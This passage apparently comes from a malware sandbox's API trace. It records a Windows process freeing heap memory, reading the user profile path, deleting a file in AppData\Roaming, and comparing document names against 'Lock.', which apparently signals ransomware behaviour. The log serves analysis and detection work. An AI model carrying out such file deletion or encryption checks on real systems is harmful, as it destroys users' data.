(in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0205.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0205.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0205.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0205.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0205.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0205.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0205.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0205.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0205.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0205.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0205.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0205.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0205.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0205.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0205.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0205.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0205.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0205.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0205.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0205.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0205.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0205.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0205.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0205.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0205.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0205.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0205.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0205.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0205.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0205.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0205.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0205.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0205.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0205.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0205.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0205.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0205.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0205.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0205.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0205.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0205.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0205.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0205.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0205.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0205.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0205.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0205.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0205.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0205.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0205.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0205.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0205.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0205.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0205.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0205.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0205.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0205.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0205.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0205.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0205.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0205.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0205.988] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0205.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0205.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0205.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0205.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0205.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0205.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0205.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0205.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0205.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0205.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0205.988] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0205.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0205.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0205.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d20 [0205.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0205.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0205.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0205.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0205.989] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0205.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0205.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0205.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0205.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0205.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0205.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0205.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0205.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0205.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0205.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0205.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0205.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0205.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0205.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0205.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0205.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0205.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0205.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0205.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0205.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0205.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0205.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0205.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0205.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0205.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0205.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0205.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x82) returned 0x2420898 [0205.990] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/ngBTzibcz-Ml b.gif", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ngBTzibcz-Ml b.gif", lpFilePart=0x8bedfc*="ngBTzibcz-Ml b.gif") returned 0x40 [0205.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0205.990] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ngBTzibcz-Ml b.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ngbtzibcz-ml b.gif")) returned 0x2020 [0205.990] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ngBTzibcz-Ml b.gif", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbbeeb20, ftCreationTime.dwHighDateTime=0x1d4c541, ftLastAccessTime.dwLowDateTime=0x7bcd98d0, ftLastAccessTime.dwHighDateTime=0x1d4ca6b, ftLastWriteTime.dwLowDateTime=0x7bcd98d0, ftLastWriteTime.dwHighDateTime=0x1d4ca6b, nFileSizeHigh=0x0, nFileSizeLow=0xb5e0, dwReserved0=0xd65, dwReserved1=0x4, cFileName="ngBTzibcz-Ml b.gif", cAlternateFileName="NGBTZI~1.GIF")) returned 0xaa5820 [0205.991] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ngBTzibcz-Ml b.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ngbtzibcz-ml b.gif")) returned 1 [0205.993] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbbeeb20, ftCreationTime.dwHighDateTime=0x1d4c541, ftLastAccessTime.dwLowDateTime=0x7bcd98d0, ftLastAccessTime.dwHighDateTime=0x1d4ca6b, ftLastWriteTime.dwLowDateTime=0x7bcd98d0, ftLastWriteTime.dwHighDateTime=0x1d4ca6b, nFileSizeHigh=0x0, nFileSizeLow=0xb5e0, dwReserved0=0xd65, dwReserved1=0x4, cFileName="ngBTzibcz-Ml b.gif", cAlternateFileName="NGBTZI~1.GIF")) returned 0 [0205.993] FindClose (in: hFindFile=0xaa5820 | out: hFindFile=0xaa5820) returned 1 [0205.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0205.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0205.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0205.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0205.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0205.993] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0205.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0205.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0205.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0205.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0205.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0205.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0205.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0205.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0205.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0205.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0205.994] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0205.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0205.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0205.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0205.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0205.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0205.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa260 [0205.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0205.994] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0205.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0205.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0205.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0205.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0205.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0205.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0205.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0205.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0205.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0205.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0205.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0205.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0205.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0205.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0205.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0205.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0205.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0205.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0205.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0205.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0205.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0205.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0205.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0205.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0205.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0205.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0205.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0205.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0205.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0205.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0205.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0205.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0205.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0205.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0205.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0205.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0205.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0205.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x82) returned 0x2420898 [0205.996] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/ngBTzibcz-Ml b.gif", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ngBTzibcz-Ml b.gif", lpFilePart=0x8bf658*="ngBTzibcz-Ml b.gif") returned 0x40 [0205.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0205.996] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ngBTzibcz-Ml b.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ngbtzibcz-ml b.gif")) returned 0xffffffff [0205.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0205.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0205.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0205.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0205.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0205.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0205.997] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0205.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0205.997] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0205.997] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0205.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0205.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0205.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0205.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0205.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0205.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0205.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0205.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0205.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0205.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0205.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0205.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0205.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0205.998] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OjU _gfFJ vK4z9.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0205.998] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jU _gfFJ vK4z9.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.998] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U _gfFJ vK4z9.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0205.998] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" _gfFJ vK4z9.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.998] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_gfFJ vK4z9.pptx", cchCount1=5, 